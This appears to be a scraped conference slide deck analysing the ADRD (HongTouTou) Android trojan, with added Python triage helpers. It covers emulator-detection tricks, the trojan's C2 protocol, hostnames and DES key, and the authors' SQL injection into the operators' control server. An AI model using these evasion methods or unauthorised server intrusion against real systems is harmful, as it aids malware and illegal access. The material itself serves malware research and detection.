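As an added example (not from the deck), this is how an "infections by operator" count comes out of the IMEI/IMSI rows in the t_android table: the first three IMSI digits are the MCC, the next two or three the MNC, and the pair identifies the operator. The PLMN table is a small subset of the public allocation chosen for the operators this deck names (T-Mobile US is there because the stock emulator's hard-coded IMSI, 310260000000000, would otherwise be counted as a victim; every analyst sandbox that ran the sample phoned home too); the rows are constructed with made-up identifiers and are not data from the real database.

```python
from collections import Counter
from typing import Dict, List, Tuple

# Subset of the public MCC/MNC (PLMN) allocation covering the operators this
# deck names; extend with the full list for real data. Assumed lookup helper,
# not something the authors published.
PLMN = {
    ("460", "00"): "China Mobile",
    ("460", "01"): "China Unicom",
    ("460", "03"): "China Telecom",
    ("466", "01"): "Far EasTone",
    ("454", "03"): "Hutchison 3G",
    ("454", "06"): "SmarTone",
    ("310", "260"): "T-Mobile US",
}
# getSubscriberId() on the stock emulator modem; sandboxes phoning home look like this
EMULATOR_IMSI = "310260000000000"


def valid_imsi(imsi: str) -> bool:
    return imsi.isdigit() and 6 <= len(imsi) <= 15


def operator_for(imsi: str) -> str:
    if not valid_imsi(imsi):
        return "invalid"
    mcc = imsi[:3]
    for mnc_len in (3, 2):          # 3-digit MNCs (North America) first, then 2-digit
        name = PLMN.get((mcc, imsi[3:3 + mnc_len]))
        if name:
            return name
    return "unknown (MCC %s)" % mcc


def infections_by_operator(rows: List[Tuple[str, str]]) -> Dict[str, int]:
    """Distinct victims per operator from (imei, imsi) rows such as the t_android
    table. Repeated check-ins of one IMSI count once; malformed rows and the
    emulator IMSI are dropped."""
    victims = {imsi for _, imsi in rows if valid_imsi(imsi) and imsi != EMULATOR_IMSI}
    return dict(Counter(operator_for(i) for i in victims))


# Constructed rows with made-up identifiers (not data from the real database).
SAMPLE_ROWS = [
    ("000000000000001", "460001234567890"),   # China Mobile victim
    ("000000000000001", "460001234567890"),   # same victim, second check-in
    ("000000000000002", "460019876543210"),   # China Unicom victim
    ("000000000000003", "466011122233344"),   # Far EasTone victim
    ("000000000000004", "454065556667778"),   # SmarTone victim
    ("000000000000005", EMULATOR_IMSI),       # an analyst's emulator, not a victim
    ("000000000000006", "garbage"),           # corrupted log row
]

if __name__ == "__main__":
    print(infections_by_operator(SAMPLE_ROWS))
```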


Thank you

Questions?

@jaimeblascob
@PabloForThePPL
KDD 2016 Streaming Analytics TutorialKDD 2016 Streaming Analytics Tutorial
KDD 2016 Streaming Analytics Tutorial
 
Dmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI IntroDmitriy D1g1 Evdokimov - DBI Intro
Dmitriy D1g1 Evdokimov - DBI Intro
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with Falco
 
Android Internals
Android InternalsAndroid Internals
Android Internals
 
Android things introduction - Development for IoT
Android things introduction - Development for IoTAndroid things introduction - Development for IoT
Android things introduction - Development for IoT
 

Wtf is happening_inside_my_android_phone_public

  • 1. Lost in translation: WTF is happening inside my Android Phone
  • 2. Contents
      Android System
      Static Analysis
      Dynamic Analysis
      Reversing
      Red Bunny
      Conclusion
  • 4. DALVIK VM
      - Register-based virtual machine.
      - It uses its own bytecode, not Java bytecode.
      - Runs on a slow CPU with little RAM.
      - Runs on an operating system without swap space.
      - Optimized for memory efficiency.
      - Dex class file format.
  • 5. Dex file format (sections, in file order)
      header
      string_ids
      type_ids
      proto_ids
      field_ids
      method_ids
      class_defs
      data
  • 6. Analysis Environment
      Tools:
      - Case-sensitive file system :D
      - Android SDK
      - Android NDK
      - Android source code
      - Eclipse
      - Apktool, Dex2jar, JD-GUI
      - Android Emulator
  • 7. Example (toolchain diagram)
      .java/source --(compiler)--> .dex/dexdump
      .dex --(dex2jar)--> .java/jd-gui
      .dex --(baksmali)--> .smali
  • 8. Anti-analysis
      Examples:
      - Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems.
      - Medium: Optimize/obfuscate the code with ProGuard.
      - Hard: Modify the bytecode to break reversing tools (be sure that it still runs on Dalvik).
        Example, androguard-a1 (value-type dispatch in its dex parser):
            if self.__value_type >= VALUE_SHORT:
                ...
            elif self.__value_type == VALUE_ARRAY:
                ...
            elif self.__value_type == VALUE_BYTE:
                ...
            # slide note: "Insert value type ... VALUE_ANNOTATION" (no branch handles it, so it falls through to the else below)
            elif self.__value_type == VALUE_NULL:
                ...
            elif self.__value_type == VALUE_BOOLEAN:
                ...
            else:
                raise("oops")
  • 9. Dynamic Analysis
      Basic:
      - Create an Android Virtual Device: $ android (SDK)
      - $ emulator -port 5560 @virtual-device -tcpdump capture.pcap
      - $ adb install app.apk
      - $ adb shell monkey -v -p package.app 700
      - $ adb shell logcat -d && adb shell logcat -b events -d   (the radio buffer too)
      - $ adb shell '/data/busybox find / -type f -exec /data/busybox md5sum {} \;'
  • 10. Make it more real
      - Simulate phone events through the emulator console (port 5554):
        Send an SMS:
          $ echo sms send +34656566789 test | nc localhost 5554
          Resulting log line:
          D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c
        Simulate calls:
          $ echo gsm call +34656566789 | nc localhost 5554
          $ echo gsm accept +34656566789 | nc localhost 5554
          $ echo gsm cancel +34656566789 | nc localhost 5554
        Change GPS coordinates:
          $ echo geo fix -82.411629 28.054553 | nc localhost 5554
  • 11. Dynamic Analysis
      Advanced:
      - Create your own system image and modify the Java classes to log the program flow.
        Example: frameworks/base/core/java/android/os/Process.java
  • 12. Compiling Android kernel modules
      $ git clone git://android.git.kernel.org/kernel/common
      $ git branch -a
      $ git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29
      $ adb pull /proc/config.gz ./; gunzip config.gz; mv config .config
      Edit .config and add CONFIG_MODULES=y (disabled by default in the emulator kernel), then boot the emulator with the rebuilt kernel:
      $ emulator -avd armv5y -kernel /tmp/zImage
  • 13. System-call hooking
      $ grep sys_call_table System.map
  • 14. Anti-VM
      - Detecting the emulator is very easy:
        DEVICE_ID:
          String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
          boolean emulator = TextUtils.isEmpty(id);
        Solution: change the android_id row of the secure table in /data/data/com.android.providers.settings/databases/settings.db
        IMSI:
          TelephonyManager manager = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
          String imsi = manager.getSubscriberId();   // 00000... on the emulator
        Solution: patch the emulator binary (search for the "+CGSN" string) or the emulator source code (external/qemu/telephony/android_modem.c).
  • 15. More Anti-VM
      - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
      - Detect ADB artefacts: process, network, debugging enabled...
      - /proc/cpuinfo -> Hardware : Goldfish
      - vibrator.vibrate(milliseconds) and use a SensorListener (sensor data doesn't change) (thanks Ehooo)
      - QEMU-specific detection (Google)
      Solution: patch the emulator, QEMU, system hooking...
  • 16. Alternatives to the Android Emulator
      - http://www.android-x86.org/ (supports VMware)
      - Use a real phone... slower.
  • 17. Attack Vectors
      - Alternative markets, repackaged applications.
      - SMS, MMS vulnerabilities: fuzzing!!!
      - Wireless, Bluetooth drivers
      - NFC
      - System components: WebKit, sound library, kernel.
  • 18. Third-party software
      Source: http://android.git.kernel.org/
  • 19. ADRD aka Redbunny
      - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" (http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1)
      - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]"
      - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011:
        * Name: com.beautyfullivewallpaper
        * Date: Feb. 2, 2011, 1:49 p.m.
      - Also known as HongTouTou
  • 20. Detection
      - Permission list:
        * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS...
      - Cipher module/library calls (DES):
        * init             Ljavax/crypto/Cipher;     Lcom/xxx/yyy/ddda;        decrypt
      - Function calls to retrieve the IMSI/IMEI codes:
        * IMEI: getDeviceId         Lcom/xxx/yyy/MyService;    onCreate
        * IMSI: getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate
      - HTTP requests (GET and POST):
        * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;
        * adrd.xiaxiab.com  POST  /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af
  • 21. Detection
      - Sends HTTP requests through a proxy:
        * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
        * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);
      - Services:
        * com.xxx.yyy.MyService
        * .beauty.Beauty
      - Intents:
        * android.intent.action.BOOT_COMPLETED **** -> boots at system startup
        * android.intent.action.PHONE_STATE
        * android.net.conn.CONNECTIVITY_CHANGE
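As an added example (not code from the talk), a small static check that runs the indicators from the two Detection slides over apktool's decoded AndroidManifest.xml and baksmali output; the sample manifest and smali lines are constructed, and the `adrd_like` threshold is this example's own heuristic.

```python
# Added example (not from the talk): static triage of apktool/baksmali output
# against the ADRD indicators on the slides. Sample inputs are constructed.
import re
import xml.etree.ElementTree as ET

ANS = "{http://schemas.android.com/apk/res/android}"
ADRD_PERMISSIONS = {"INTERNET", "WRITE_EXTERNAL_STORAGE", "ACCESS_NETWORK_STATE",
                    "READ_PHONE_STATE", "RECEIVE_BOOT_COMPLETED",
                    "MODIFY_PHONE_STATE", "WRITE_APN_SETTINGS"}
# invoke-* targets the slides flag, mapped to what they mean to an analyst
SUSPECT_CALLS = {("Landroid/telephony/TelephonyManager;", "getDeviceId"): "IMEI read",
                 ("Landroid/telephony/TelephonyManager;", "getSubscriberId"): "IMSI read",
                 ("Ljavax/crypto/Cipher;", "getInstance"): "Cipher.getInstance"}
INVOKE_RE = re.compile(r"invoke-\w+(?:/range)? \{[^}]*\}, (L[\w/$]+;)->(\w+)\(")
CONST_STRING_RE = re.compile(r'const-string(?:/jumbo)? v\d+, "([^"]*)"')

def manifest_findings(manifest_xml):
    """Permissions from the ADRD set and whether a receiver listens for boot."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANS + "name", "").rsplit(".", 1)[-1] for p in root.iter("uses-permission")}
    boot = any(a.get(ANS + "name") == "android.intent.action.BOOT_COMPLETED"
               for r in root.iter("receiver") for a in r.iter("action"))
    return {"permissions": sorted(perms & ADRD_PERMISSIONS), "boot_receiver": boot}

def smali_findings(smali_text):
    """Identifier lookups, cipher use and a DES transformation string in the smali."""
    calls = {SUSPECT_CALLS[k] for k in INVOKE_RE.findall(smali_text) if k in SUSPECT_CALLS}
    strings = CONST_STRING_RE.findall(smali_text)
    return {"calls": sorted(calls), "des": any(s.startswith("DES/") for s in strings)}

def triage(manifest_xml, smali_text):
    """Combine both views; the 'adrd_like' rule is this example's own heuristic."""
    f = dict(manifest_findings(manifest_xml), **smali_findings(smali_text))
    f["adrd_like"] = (len(f["permissions"]) >= 5 and f["boot_receiver"]
                      and "IMSI read" in f["calls"] and f["des"])
    return f

# Constructed sample in the shape apktool (manifest) and baksmali (smali) emit
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
<uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
<application><receiver android:name=".beauty.Beauty"><intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver></application></manifest>"""
SAMPLE_SMALI = """invoke-virtual {v1}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
invoke-virtual {v1}, Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
const-string v2, "DES/CBC/PKCS5Padding"
invoke-static {v2}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;"""
```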
  • 22. Analysis I
      - Service module (MyService):
        * Sets the preferred APN.
        * Runs every 12 hours.
        * Looks for a specific APN network: "CMWAP" || "UNIWAP".
        * Sets a proxy for GET/POST and specially crafted HTTP headers (UA, MIME types).
      - Cipher data module: public static String encrypt/decrypt
          Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
      - Sends data to adrd.taxuan.net/index.aspx?im=%s: IMEI + IMSI + Netway (preferred APN) + iversion + oversion.
        Loop: decrypt the response, then switch(cmd) (what happens next depends on the command):
          0: do nothing
          1: adad.StartGo()
          2: ParseO()
          3: UpdateHelper()
      - adad.StartGo(): sends http://adrd.xiaxiab.com/pic.aspx?im= + encrypt(IMEI+IMSI) and parses the big list of URLs/referers, e.g.
          B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1
      - UpdateHelper installs the update apk.
      - BBBB.Go() -> retrieves search lists from wap.baidu.com. FixUrls(): sends random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parses the server response (number, flags, tags...). Sends log data to the control servers, e.g.
          T213607170863|12345|+ -10086+ abc -597| [ '
  • 23. Analysis II
      - Following the encryption routines, the DES key is found: this.kk = "48734154";
      * UpdateHelper class:
          public class UpdateHelper {
              private static String savefilepath = "/myupdate.apk";
              private Context ct;
              private int netway;
              // ...
          }
      * Benefit: visits to the content (Baidu), bandwidth consumption (China Mobile && Unicom) and also SMS charges.
      - Server URLs (there are more):
        http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
        http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
      - We want to know more!!
  • 24. Control Servers
      - adrd.xiaxiab.com from an eagle's-eye view:
        * Microsoft-IIS/6.0
        * Debug enabled (displaying .NET errors and backtraces)
        * Hidden paths to the .NET/aspx application
        * ALL is Chinese! (WTF!?!"·$%&/(?)
      - Possible attack vectors:
        * HTTP functions + DES key + pyDes = "legal" HTTP requests (at least for the adrd server)
  • 25. Control Servers
      - First results:
        * Exceptions in Chinese. Google Translate is your friend.
        * Errors at .NET (it didn't generate any HTML list/table or view to use for displaying data).
        * We got a successful SQL injection after the last ciphered parameter :D
        * User without admin privileges.
        * Permissions to run backups + shared resources = timeout.
        * Other possibilities:
          + 1: Create a temporary DB with just one table each time, dump paginated rows and run backups. Problem: complex to do and complex to rebuild the original DB (the language didn't help either).
          + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES in the HTTP logs, and it's not usual to log all the DB queries for performance reasons).
  • 26. Database Information
      - The whole schema obtained: list of tables, fields, types, stored procedures.
      - IMEI/IMSI list (at least some of them), logs, keywords, Baidu accounts.
      - The main stored procedure affected by the SQL injection retrieves the URL of myupdate.apk, which points to adrd.xiaxiab.com/down.aspx!
        * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
        * Stored procedure (commented-out branches):
            --if (@netwap=2) select 'T-1|T11'
            --select 'T3http://adrd.xiaxiab.com/down.aspx'
            --select 'T213607170863|12345|+ -10086+ abc -597| [ '
            --else
            --select 'T013607170863'
        * It looks like they were considering netwap (based on the mobile operator) as a criterion for sending commands.
        * TX (where X seems to be a command type)
        * 13607170863 is a phone number located in Wuhan
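As an added example (not the talk's tooling), helpers for the network side of this analysis: recognising the check-in requests and decoding the decrypted `T<cmd>` replies with the switch(cmd) mapping from the Analysis I slide. It assumes the `im` value is hex-encoded DES ciphertext (hence a whole number of 8-byte blocks), and the field names inside the payloads are this example's own guesses.

```python
# Added example (not from the talk): triage helpers for ADRD C2 traffic as the
# slides describe it. Field names inside the payloads are this example's guesses.
import re
from urllib.parse import urlsplit, parse_qs

BEACON_PATHS = {"/index.aspx", "/pic.aspx"}     # MyService and adad.StartGo check-ins
HEX_RE = re.compile(r"^[0-9a-f]+$", re.I)
# switch(cmd) in the service module, as the slides describe it
COMMANDS = {"0": "noop", "1": "adad.StartGo", "2": "ParseO", "3": "UpdateHelper"}

def is_adrd_beacon(url):
    """True for a request shaped like the check-in: a known path and a single
    'im' parameter holding hex DES ciphertext (so a whole number of 8-byte blocks)."""
    parts = urlsplit(url)
    if parts.path not in BEACON_PATHS:
        return False
    im = parse_qs(parts.query).get("im", [])
    return len(im) == 1 and bool(HEX_RE.match(im[0])) and len(im[0]) % 16 == 0

def parse_response(text):
    """Decode a decrypted reply: 'T' + command digit + payload."""
    m = re.match(r"^T(-?\d)(.*)$", text, re.S)
    if not m:
        return {"cmd": None, "action": "unrecognised", "payload": text}
    cmd, payload = m.groups()
    out = {"cmd": cmd, "action": COMMANDS.get(cmd, "unknown")}
    if out["action"] == "UpdateHelper":
        out["update_url"] = payload                # apk to fetch and install
    elif out["action"] == "ParseO":
        out["fields"] = [f.strip() for f in payload.split("|")]   # number, flags, tags...
    else:
        out["payload"] = payload
    return out

def c2_hosts(responses):
    """Hostnames named in a batch of decoded replies, for blocklists/alerting."""
    hosts = {urlsplit(r["update_url"]).hostname
             for r in map(parse_response, responses) if "update_url" in r}
    return sorted(h for h in hosts if h)

# Constructed samples built from the strings quoted on the slides
SAMPLE_REQUEST = ("http://adrd.xiaxiab.com/index.aspx?im=82a68757db94a88dace3e401a5721b33"
                  "af757f73d68485eab1244e5dace3ed65910991f4dbd438af")
SAMPLE_RESPONSES = ["T3http://adrd.xiaxiab.com/down.aspx",
                    "T213607170863|12345|+ -10086+ abc -597| [ ",
                    "T013607170863"]
```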
  • 27. Database Schema (names shown as "t_ " lost their non-Latin part in the extraction)
      t_baiduHourPercent: autoid, mHour, mPercent
      t_ : myear, mmonth, mday, mhour, total
      t_baidukeyword: keyword, viewcount
      t_ : way, flag
      t_baidukeywordflash: keyword
      t_baiduOrtherKey: keyword, viewcount
      t_ : keyword, flag
      t_baidupwd: id, way, username, pwd
      t_ _wap: keyword, flag
      t_baiduwayname: way, wayname
      t_ _wap_back: keyword, flag
      t_keywordResult: id, keyword, link, head, flag
      t_androidtemplog: id, imsi, way, result, createtime
      t_ _wap_back: keyword, flag
      t_keywordResult20100601: id, keyword, link, head, flag
      t_ : flag
      t_keywordResult20101108: id, keyword, link, head, flag
      t_ : keyword, createtime
      t_baiduHourPercent20101012: autoid, mHour, mPercent
      t_androidtemplog_backup: id, imsi, way, result, createtime
      t_ _wap: keyword, createtime
      t_androidtemperrlog: id, compresslog, decompresslog, createtime
      t_ : keyword, createtime
      t_androidtemplog_backup201101: id, imsi, way, result, createtime
      t_ _wap: keyword, createtime
      t_android : id, imei, imsi, logs, ip, createtime, netway
      t_android : , , , , createtime
      t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid
      t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick
      t_ _wap_20100323: keyword, createtime
      t_ _wap_20100722: keyword, createtime
  • 28. Myupdate.apk
      - It uses the main package of the ADRD family, xxx.yyy.
      - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS...
      - Looks like a Google Reader.
      - It adds a local SQLite DB (keyword storage):
        go_g1_sms: id, keyword, type, flag
        go_g2_sms: id, keyword, keyword2
      - SMSObserver:
        * Replaces keywords in SMSs.
        * Sends SMS!
  • 29. Samples
      Package name                          MD5                               ADRD ver        IVer
      com.beautyfullivewallpaper            4556a687a2845bf4dfac62c594938cf3  adrd.zt.cw.1    6
      com.yodesoft.yohandcar                6783cee889fa64df68af58a56ff6e362  adrd.zt.2       6
      com.binaryloft.live.winter            aa5216da617839e818d83d8185da42b0  adrd.zt.jtj.2   6
      com.magicwach.rdefense                839c37f3a2c8d31561d28f619a2a712e  adrd.zt.cw.3    6
      com.tat.livewallpaper.dandelion       5192ad05597e7a148f642be43f6441f6  adrd.zt.cw.4    6
      com.classicnerds.livewallpaper.HK     b72724d8fc0f633194dcc3bd28eec026  adrd.zt.cw.5    7
      fishnoodle.night_city                 a01ba26a34e55f71873782348ff5e074  adrd.zt.dxm.6   7
      com.appspot.swisscodemonkeys.steam    cdfca19bf212adf3292e4fe677fe46a6  adrd.zt.cw.7    7
      kr.mobilesoft.yxplayer                e3cc6c7af0d83fe322116254c01cf720  adrd.zt.cw.8    7
      com.labgency.wallpapers.waves         7d764347a0b0c9d11160d7a7684bf02b  adrd.zt.dxm.8   7
      com.laucass.andromax                  627f41c8f8e7ab007641c4a0c1d8ce1b  adrd.zt.cw.9    7
      com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12    7
      proscio.wallpaper.shamroc             e09782d35d72a769dc7454adb6d8e2e9  adrd.zt.cw.15   7
      com.tt.yy                             f2596f8f3c52381318f62d1ab161c284  ??              ??
  • 30. Infections: geolocation (map)
  • 31. Infections by operator
      - +20K different IMSIs
      - Other affected operators: Far EasTone, Peoples Telephone Company, Hutchison 3G, PCCW Mobile, Sunday, Hong Kong Telecom, SmarTone Mobile
  • 32. Thank You! Questions?
      @jaimeblascob @PabloForThePPL